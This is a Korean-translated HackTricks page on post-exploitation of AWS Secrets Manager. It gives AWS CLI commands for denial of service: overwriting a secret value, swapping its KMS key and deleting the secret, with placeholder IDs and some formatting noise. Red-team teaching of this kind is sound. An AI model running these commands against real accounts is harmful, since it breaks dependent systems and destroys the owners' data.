AWS - Secrets Manager Post Exploitation

htARTE (HackTricks AWS Red Team 전문가)를 통해 **제로부터 영웅까지 AWS 해킹을 배우세요**!

HackTricks를 지원하는 다른 방법:

회사를 HackTricks에서 광고하거나 PDF로 다운로드하고 싶다면 구독 요금제를 확인하세요!
공식 PEASS & HackTricks 스왜그를 구매하세요
The PEASS Family를 발견하세요, 당사의 독점 NFTs 컬렉션
💬 Discord 그룹 또는 텔레그램 그룹에 가입하거나 트위터** 🐦 @hacktricks_live를 팔로우하세요.
해킹 트릭을 공유하고 싶다면 HackTricks 및 HackTricks Cloud github 저장소에 PR을 제출하세요.

Secrets Manager

자세한 정보는 확인하세요:

pageAWS - Secrets Manager Enum

Secrets 읽기

Secrets 자체는 민감한 정보이며, 특권 상승 페이지를 확인하여 어떻게 읽는지 배우세요.

DoS 변경 비밀 값

비밀 값을 변경하면 해당 값에 의존하는 시스템 전체를 DoS할 수 있습니다.

이전 값도 저장되므로 이전 값으로 쉽게 되돌아갈 수 있습니다.

```bash # Requires permission secretsmanager:PutSecretValue aws secretsmanager put-secret-value \ --secret-id MyTestSecret \ --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" ``` ### DoS KMS 키 변경 ```bash aws secretsmanager update-secret \ --secret-id MyTestSecret \ --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE ``` ### DoS 시크릿 삭제

시크릿을 삭제하는 최소 일 수는 7일입니다.

aws secretsmanager delete-secret \
--secret-id MyTestSecret \
--recovery-window-in-days 7

htARTE (HackTricks AWS Red Team 전문가)로부터 AWS 해킹을 제로부터 전문가까지 배우세요

다른 방법으로 HackTricks를 지원하는 방법:

회사가 HackTricks에서 광고되길 원하거나 HackTricks를 PDF로 다운로드하고 싶다면 구독 요금제를 확인하세요!
공식 PEASS & HackTricks 스왜그를 구매하세요
The PEASS Family를 발견하세요, 당사의 독점 NFTs 컬렉션
💬 Discord 그룹 또는 텔레그램 그룹에 가입하거나 Twitter 🐦 @hacktricks_live을 팔로우하세요.
HackTricks 및 HackTricks Cloud github 저장소에 PR을 제출하여 해킹 트릭을 공유하세요.

前へAWS - S3 Post Exploitation 次へAWS - SES Post Exploitation

最終更新 1 か月前